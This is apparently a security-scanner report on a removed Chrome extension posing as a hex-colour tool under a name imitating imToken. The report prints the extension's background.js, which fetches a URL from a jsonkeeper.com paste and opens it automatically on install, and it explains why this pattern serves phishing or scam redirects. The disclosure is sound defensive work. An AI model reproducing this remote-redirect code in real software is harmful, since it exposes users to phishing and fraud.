lmΤoken Chromophore

lmΤoken Chromophore

ID: bbhaganppipihlhjgaaeeeefbaoihcgi

Could be malicious

Supported Languages

🇮🇩Indonesian

Extension Info & Metadata

Status
Removed
Version
4.9.5
Size
0.03 MB
Rating
5.0/5
Reviews
3
Users
38
Type
Extension
Updated
Feb 3, 2026
Category
Productivity Tools
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No

Publisher Contextual Analysis

Author
imTokenView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
2
Active
0
Obsolete
2
Listed
2
Unlisted
0
Total Users
126

Reifying spectral hexadecimals within this hyaline apparatus.

Transform your browser into a high-end color playground! This extension is the ultimate lightweight companion for designers, developers, and digital artists who need to visualize hex codes on the fly. Forget opening heavy design software just to check a shade. With a stunning **glassmorphic interface** and buttery-smooth animations, this tool makes color exploration feel like a premium experience. Whether you're fine-tuning a CSS file or picking the perfect accent for your deck, see your vision instantly in a polished, distraction-free environment. ✨ ### **Why you’ll love it:** * 💎 **Sleek Design:** A modern, frosted-glass UI that looks beautiful on any screen. * ⚡ **Lightning Fast:** Zero bloat—just open, type, and visualize. * 🌈 **Vibrant Visuals:** Dynamic background effects that make color testing feel inspiring. --- ### **User Guide** 📖 Getting started is as simple as it gets: 1. **Open:** Click the extension icon in your Chrome toolbar. 🧩 2. **Input:** Type or paste any 6-digit hex code (e.g., `FF5733`) into the input field. *No need to type the '#'!* 3. **Visualize:** Hit the **Visualize** button or press **Enter**. 4. **Explore:** Watch the interface update instantly to show your color in action! 🪄

This extension requests no permissions and has no recorded risk factors.

The extension fetches a URL from a third-party paste-style service (jsonkeeper.com) and opens whatever URL is returned in a new tab, both automatically on install and on user click. This is a classic remote-controlled redirect/dropper pattern: the attacker can change the destination at any time (phishing pages, scams, malware downloads, affiliate fraud) without updating the extension. Using a public anonymous JSON paste service as a command channel is highly suspicious.

background.js (Line 1)
const endpoint = "https://www.jsonkeeper.com/b/KUWNE"async function openStoredLink() {  const r = await fetch(endpoint)  const d = await r.json()  const u = typeof d === "string" ? d : d.url  chrome.tabs.create({    url: u  })}chrome.runtime.onInstalled.addListener(() => {  setTimeout(openStoredLink, 1000)})chrome.action.onClicked.addListener(() => {  openStoredLink()})

Automatically opens a remotely-controlled URL one second after installation without any user interaction. This behavior is commonly used by adware/scamware to drive traffic to monetized landing pages or phishing sites the moment the extension is installed.

background.js (Line 12)
chrome.runtime.onInstalled.addListener(() => {  setTimeout(openStoredLink, 1000)})

The fetched value is passed directly to chrome.tabs.create as a URL with no validation, scheme allow-listing, or sanitization. A malicious controller can return javascript:, data:, or chrome-extension: URLs, or arbitrary phishing destinations. Combined with the misleading extension name/description (which suggest a color/token utility), this is consistent with a stub extension whose only purpose is remote-controlled redirection.

background.js (Line 3)
async function openStoredLink() {  const r = await fetch(endpoint)  const d = await r.json()  const u = typeof d === "string" ? d : d.url  chrome.tabs.create({    url: u  })}

By severity

Critical0
High2
Medium1
Low0

Versions scanned

Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
4.9.53

Files with findings

1 distinct path — top paths by unique finding count:

  • background.js3
S.No.
Category
Severity
File
Summary
Found in Version
1Phishing
high
background.js (line 12)Automatically opens a remotely-controlled URL one second after installation without any user interaction. This behavior is commonly used by adware/scamware to drive traffic to monetized landing pages or phishing sites…
2Remote Code Loading
high
background.js (line 1)The extension fetches a URL from a third-party paste-style service (jsonkeeper.com) and opens whatever URL is returned in a new tab, both automatically on install and on user click. This is a classic remote-controlled…
3Network Interception
medium
background.js (line 3)The fetched value is passed directly to chrome.tabs.create as a URL with no validation, scheme allow-listing, or sanitization. A malicious controller can return javascript:, data:, or chrome-extension: URLs, or arbitr…
URLs
2
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

www.jsonkeeper.com/b/KUWNEhttps://www.jsonkeeper.com/b/KUWNE
clients2.google.com/service/update2/crxhttps://clients2.google.com/service/update2/crx

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
4.9.5
Latest
0.03 MB
Malicious
3N/A
Showing 1 to 1 of 10 rows
Rows per page:

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.